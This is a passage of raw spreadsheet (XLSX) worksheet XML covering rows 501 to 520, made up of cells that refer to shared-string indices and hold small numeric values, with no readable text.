      <c r="S501" s="12" t="s">
        <v>3924</v>
      </c>
      <c r="T501" s="12" t="s">
        <v>3925</v>
      </c>
      <c r="U501" s="12" t="s">
        <v>3926</v>
      </c>
      <c r="V501" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W501" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X501" s="12">
        <v>2</v>
      </c>
      <c r="Y501" s="12" t="s">
        <v>3927</v>
      </c>
    </row>
    <row r="502" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A502" s="12">
        <v>2104</v>
      </c>
      <c r="B502" s="12" t="s">
        <v>28754</v>
      </c>
      <c r="C502" s="12" t="s">
        <v>28759</v>
      </c>
      <c r="D502" s="12" t="s">
        <v>28755</v>
      </c>
      <c r="F502" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G502" s="12" t="s">
        <v>3935</v>
      </c>
      <c r="H502" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I502" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J502" s="12" t="s">
        <v>122</v>
      </c>
      <c r="K502" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L502" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M502" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N502" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O502" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P502" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q502" s="12">
        <v>2.6</v>
      </c>
      <c r="R502" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S502" s="12" t="s">
        <v>3936</v>
      </c>
      <c r="T502" s="12" t="s">
        <v>3937</v>
      </c>
      <c r="U502" s="12" t="s">
        <v>3938</v>
      </c>
      <c r="V502" s="12" t="s">
        <v>200</v>
      </c>
      <c r="W502" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X502" s="12">
        <v>1</v>
      </c>
      <c r="Y502" s="12" t="s">
        <v>3939</v>
      </c>
    </row>
    <row r="503" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A503" s="12">
        <v>2107</v>
      </c>
      <c r="B503" s="12" t="s">
        <v>28760</v>
      </c>
      <c r="D503" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E503" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F503" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G503" s="12" t="s">
        <v>3940</v>
      </c>
      <c r="H503" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I503" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J503" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K503" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L503" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M503" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N503" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O503" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P503" s="12" t="s">
        <v>3941</v>
      </c>
      <c r="Q503" s="12">
        <v>2.6</v>
      </c>
      <c r="R503" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S503" s="12" t="s">
        <v>3942</v>
      </c>
      <c r="T503" s="12" t="s">
        <v>3943</v>
      </c>
      <c r="U503" s="12" t="s">
        <v>3944</v>
      </c>
      <c r="V503" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W503" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X503" s="12">
        <v>3</v>
      </c>
      <c r="Y503" s="12" t="s">
        <v>3945</v>
      </c>
    </row>
    <row r="504" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A504" s="12">
        <v>2109</v>
      </c>
      <c r="B504" s="12" t="s">
        <v>28761</v>
      </c>
      <c r="D504" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F504" s="12" t="s">
        <v>29725</v>
      </c>
      <c r="G504" s="12" t="s">
        <v>3952</v>
      </c>
      <c r="H504" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I504" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J504" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K504" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L504" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M504" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N504" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O504" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P504" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q504" s="12">
        <v>2.6</v>
      </c>
      <c r="R504" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S504" s="12" t="s">
        <v>3953</v>
      </c>
      <c r="T504" s="12" t="s">
        <v>3954</v>
      </c>
      <c r="U504" s="12" t="s">
        <v>3955</v>
      </c>
      <c r="V504" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W504" s="12">
        <v>2183</v>
      </c>
      <c r="X504" s="12">
        <v>24</v>
      </c>
      <c r="Y504" s="12" t="s">
        <v>3956</v>
      </c>
    </row>
    <row r="505" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A505" s="12">
        <v>2113</v>
      </c>
      <c r="B505" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D505" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F505" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G505" s="12" t="s">
        <v>3962</v>
      </c>
      <c r="H505" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I505" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J505" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K505" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L505" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M505" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N505" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O505" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P505" s="12" t="s">
        <v>3963</v>
      </c>
      <c r="Q505" s="12">
        <v>2.6</v>
      </c>
      <c r="R505" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S505" s="12" t="s">
        <v>3964</v>
      </c>
      <c r="T505" s="12" t="s">
        <v>3965</v>
      </c>
      <c r="U505" s="12" t="s">
        <v>3966</v>
      </c>
      <c r="V505" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W505" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X505" s="12">
        <v>2</v>
      </c>
      <c r="Y505" s="12" t="s">
        <v>3967</v>
      </c>
    </row>
    <row r="506" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A506" s="12">
        <v>2115</v>
      </c>
      <c r="B506" s="12" t="s">
        <v>28762</v>
      </c>
      <c r="C506" s="12" t="s">
        <v>28763</v>
      </c>
      <c r="D506" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F506" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G506" s="12" t="s">
        <v>3968</v>
      </c>
      <c r="H506" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I506" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J506" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K506" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L506" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M506" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N506" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O506" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P506" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q506" s="12">
        <v>2.6</v>
      </c>
      <c r="R506" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S506" s="12" t="s">
        <v>3969</v>
      </c>
      <c r="T506" s="12" t="s">
        <v>3970</v>
      </c>
      <c r="U506" s="12" t="s">
        <v>3971</v>
      </c>
      <c r="V506" s="12" t="s">
        <v>1302</v>
      </c>
      <c r="W506" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X506" s="12">
        <v>1</v>
      </c>
      <c r="Y506" s="12" t="s">
        <v>3972</v>
      </c>
    </row>
    <row r="507" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A507" s="12">
        <v>2117</v>
      </c>
      <c r="B507" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D507" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F507" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G507" s="12" t="s">
        <v>3973</v>
      </c>
      <c r="H507" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I507" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J507" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K507" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L507" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M507" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N507" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O507" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P507" s="12" t="s">
        <v>3221</v>
      </c>
      <c r="Q507" s="12">
        <v>2.6</v>
      </c>
      <c r="R507" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S507" s="12" t="s">
        <v>3974</v>
      </c>
      <c r="T507" s="12" t="s">
        <v>3975</v>
      </c>
      <c r="U507" s="12" t="s">
        <v>3976</v>
      </c>
      <c r="V507" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W507" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X507" s="12">
        <v>1</v>
      </c>
      <c r="Y507" s="12" t="s">
        <v>3977</v>
      </c>
    </row>
    <row r="508" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A508" s="12">
        <v>2123</v>
      </c>
      <c r="B508" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C508" s="12" t="s">
        <v>28364</v>
      </c>
      <c r="D508" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E508" s="12" t="s">
        <v>31462</v>
      </c>
      <c r="F508" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G508" s="12" t="s">
        <v>3979</v>
      </c>
      <c r="H508" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I508" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J508" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K508" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L508" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M508" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N508" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O508" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P508" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q508" s="12">
        <v>2.6</v>
      </c>
      <c r="R508" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S508" s="12" t="s">
        <v>3980</v>
      </c>
      <c r="T508" s="12" t="s">
        <v>3981</v>
      </c>
      <c r="U508" s="12" t="s">
        <v>3982</v>
      </c>
      <c r="V508" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W508" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X508" s="12">
        <v>6</v>
      </c>
      <c r="Y508" s="12" t="s">
        <v>3983</v>
      </c>
    </row>
    <row r="509" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A509" s="12">
        <v>2135</v>
      </c>
      <c r="B509" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C509" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D509" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E509" s="12" t="s">
        <v>31467</v>
      </c>
      <c r="F509" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G509" s="12" t="s">
        <v>3993</v>
      </c>
      <c r="H509" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I509" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J509" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K509" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L509" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M509" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N509" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O509" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P509" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q509" s="12">
        <v>2.6</v>
      </c>
      <c r="R509" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S509" s="12" t="s">
        <v>3995</v>
      </c>
      <c r="T509" s="12" t="s">
        <v>3996</v>
      </c>
      <c r="U509" s="12" t="s">
        <v>3997</v>
      </c>
      <c r="V509" s="12" t="s">
        <v>1760</v>
      </c>
      <c r="W509" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X509" s="12">
        <v>6</v>
      </c>
      <c r="Y509" s="12" t="s">
        <v>3998</v>
      </c>
    </row>
    <row r="510" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A510" s="12">
        <v>2141</v>
      </c>
      <c r="B510" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C510" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D510" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E510" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F510" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G510" s="12" t="s">
        <v>4000</v>
      </c>
      <c r="H510" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I510" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J510" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K510" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L510" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M510" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N510" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O510" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P510" s="12" t="s">
        <v>4001</v>
      </c>
      <c r="Q510" s="12">
        <v>2.6</v>
      </c>
      <c r="R510" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S510" s="12" t="s">
        <v>4002</v>
      </c>
      <c r="T510" s="12" t="s">
        <v>4003</v>
      </c>
      <c r="U510" s="12" t="s">
        <v>4004</v>
      </c>
      <c r="V510" s="12" t="s">
        <v>411</v>
      </c>
      <c r="W510" s="12">
        <v>2288</v>
      </c>
      <c r="X510" s="12">
        <v>9</v>
      </c>
      <c r="Y510" s="12" t="s">
        <v>4005</v>
      </c>
    </row>
    <row r="511" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A511" s="12">
        <v>2146</v>
      </c>
      <c r="B511" s="12" t="s">
        <v>28764</v>
      </c>
      <c r="C511" s="12" t="s">
        <v>28765</v>
      </c>
      <c r="D511" s="12" t="s">
        <v>28766</v>
      </c>
      <c r="F511" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G511" s="12" t="s">
        <v>4006</v>
      </c>
      <c r="H511" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I511" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J511" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K511" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L511" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M511" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N511" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O511" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P511" s="12" t="s">
        <v>3788</v>
      </c>
      <c r="Q511" s="12">
        <v>2.6</v>
      </c>
      <c r="R511" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S511" s="12" t="s">
        <v>4007</v>
      </c>
      <c r="T511" s="12" t="s">
        <v>4008</v>
      </c>
      <c r="U511" s="12" t="s">
        <v>4009</v>
      </c>
      <c r="V511" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W511" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X511" s="12">
        <v>7</v>
      </c>
      <c r="Y511" s="12" t="s">
        <v>4010</v>
      </c>
    </row>
    <row r="512" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A512" s="12">
        <v>2148</v>
      </c>
      <c r="B512" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C512" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D512" s="12" t="s">
        <v>28768</v>
      </c>
      <c r="E512" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F512" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G512" s="12" t="s">
        <v>4011</v>
      </c>
      <c r="H512" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I512" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J512" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K512" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L512" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M512" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N512" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O512" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P512" s="12" t="s">
        <v>4012</v>
      </c>
      <c r="Q512" s="12">
        <v>2.6</v>
      </c>
      <c r="R512" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S512" s="12" t="s">
        <v>4013</v>
      </c>
      <c r="T512" s="12" t="s">
        <v>4014</v>
      </c>
      <c r="U512" s="12" t="s">
        <v>4015</v>
      </c>
      <c r="V512" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W512" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X512" s="12">
        <v>3</v>
      </c>
      <c r="Y512" s="12" t="s">
        <v>4016</v>
      </c>
    </row>
    <row r="513" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A513" s="12">
        <v>2149</v>
      </c>
      <c r="B513" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D513" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F513" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G513" s="12" t="s">
        <v>28769</v>
      </c>
      <c r="H513" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I513" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J513" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K513" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L513" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M513" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N513" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O513" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P513" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q513" s="12">
        <v>2.6</v>
      </c>
      <c r="R513" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S513" s="12" t="s">
        <v>4017</v>
      </c>
      <c r="T513" s="12" t="s">
        <v>4018</v>
      </c>
      <c r="U513" s="12" t="s">
        <v>4019</v>
      </c>
      <c r="V513" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W513" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X513" s="12">
        <v>1</v>
      </c>
      <c r="Y513" s="12" t="s">
        <v>4020</v>
      </c>
    </row>
    <row r="514" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A514" s="12">
        <v>2157</v>
      </c>
      <c r="B514" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D514" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F514" s="12" t="s">
        <v>29756</v>
      </c>
      <c r="G514" s="12" t="s">
        <v>4021</v>
      </c>
      <c r="H514" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I514" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J514" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K514" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L514" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M514" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N514" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O514" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P514" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q514" s="12">
        <v>2.6</v>
      </c>
      <c r="R514" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S514" s="12" t="s">
        <v>4022</v>
      </c>
      <c r="T514" s="12" t="s">
        <v>4023</v>
      </c>
      <c r="U514" s="12" t="s">
        <v>4024</v>
      </c>
      <c r="V514" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W514" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X514" s="12">
        <v>6</v>
      </c>
      <c r="Y514" s="12" t="s">
        <v>4025</v>
      </c>
    </row>
    <row r="515" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A515" s="12">
        <v>2173</v>
      </c>
      <c r="B515" s="12" t="s">
        <v>28767</v>
      </c>
      <c r="D515" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E515" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F515" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G515" s="12" t="s">
        <v>28771</v>
      </c>
      <c r="H515" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I515" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J515" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K515" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L515" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M515" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N515" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O515" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P515" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q515" s="12">
        <v>2.6</v>
      </c>
      <c r="R515" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S515" s="12" t="s">
        <v>4027</v>
      </c>
      <c r="T515" s="12" t="s">
        <v>4028</v>
      </c>
      <c r="U515" s="12" t="s">
        <v>4029</v>
      </c>
      <c r="V515" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W515" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X515" s="12">
        <v>6</v>
      </c>
      <c r="Y515" s="12" t="s">
        <v>4030</v>
      </c>
    </row>
    <row r="516" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A516" s="12">
        <v>2177</v>
      </c>
      <c r="B516" s="12" t="s">
        <v>28772</v>
      </c>
      <c r="D516" s="12" t="s">
        <v>28773</v>
      </c>
      <c r="E516" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F516" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G516" s="12" t="s">
        <v>4036</v>
      </c>
      <c r="H516" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I516" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J516" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K516" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L516" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M516" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N516" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O516" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P516" s="12" t="s">
        <v>4037</v>
      </c>
      <c r="Q516" s="12">
        <v>2.5</v>
      </c>
      <c r="R516" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S516" s="12" t="s">
        <v>4038</v>
      </c>
      <c r="T516" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U516" s="12" t="s">
        <v>4039</v>
      </c>
      <c r="V516" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W516" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X516" s="12">
        <v>4</v>
      </c>
      <c r="Y516" s="12" t="s">
        <v>4040</v>
      </c>
    </row>
    <row r="517" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A517" s="12">
        <v>2184</v>
      </c>
      <c r="B517" s="12" t="s">
        <v>28774</v>
      </c>
      <c r="C517" s="12" t="s">
        <v>28775</v>
      </c>
      <c r="D517" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F517" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G517" s="12" t="s">
        <v>4045</v>
      </c>
      <c r="H517" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I517" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J517" s="12" t="s">
        <v>1446</v>
      </c>
      <c r="K517" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L517" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M517" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N517" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O517" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P517" s="12" t="s">
        <v>4046</v>
      </c>
      <c r="Q517" s="12">
        <v>2.6</v>
      </c>
      <c r="R517" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S517" s="12" t="s">
        <v>4047</v>
      </c>
      <c r="T517" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U517" s="12" t="s">
        <v>4048</v>
      </c>
      <c r="V517" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W517" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X517" s="12">
        <v>8</v>
      </c>
      <c r="Y517" s="12" t="s">
        <v>4049</v>
      </c>
    </row>
    <row r="518" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A518" s="12">
        <v>2186</v>
      </c>
      <c r="B518" s="12" t="s">
        <v>28776</v>
      </c>
      <c r="D518" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F518" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G518" s="12" t="s">
        <v>4050</v>
      </c>
      <c r="H518" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I518" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J518" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K518" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L518" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M518" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N518" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O518" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P518" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q518" s="12">
        <v>2.6</v>
      </c>
      <c r="R518" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S518" s="12" t="s">
        <v>4051</v>
      </c>
      <c r="T518" s="12" t="s">
        <v>4052</v>
      </c>
      <c r="U518" s="12" t="s">
        <v>4053</v>
      </c>
      <c r="V518" s="12" t="s">
        <v>4054</v>
      </c>
      <c r="W518" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X518" s="12">
        <v>1</v>
      </c>
      <c r="Y518" s="12" t="s">
        <v>4055</v>
      </c>
    </row>
    <row r="519" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A519" s="12">
        <v>2187</v>
      </c>
      <c r="B519" s="12" t="s">
        <v>28777</v>
      </c>
      <c r="C519" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D519" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F519" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G519" s="12" t="s">
        <v>4056</v>
      </c>
      <c r="H519" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I519" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J519" s="12" t="s">
        <v>1873</v>
      </c>
      <c r="K519" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L519" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M519" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N519" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O519" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P519" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q519" s="12">
        <v>2.6</v>
      </c>
      <c r="R519" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S519" s="12" t="s">
        <v>4057</v>
      </c>
      <c r="T519" s="12" t="s">
        <v>3604</v>
      </c>
      <c r="U519" s="12" t="s">
        <v>4058</v>
      </c>
      <c r="V519" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W519" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X519" s="12">
        <v>5</v>
      </c>
      <c r="Y519" s="12" t="s">
        <v>4059</v>
      </c>
    </row>
    <row r="520" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A520" s="12">
        <v>2190</v>
      </c>
      <c r="B520" s="12" t="s">
        <v>28778</v>
      </c>
      <c r="D520" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F520" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G520" s="12" t="s">
        <v>4063</v>
      </c>
      <c r="H520" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I520" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J520" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K520" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L520" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M520" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N520" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O520" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P520" s="12" t="s">
        <v>4061</v>
      </c>
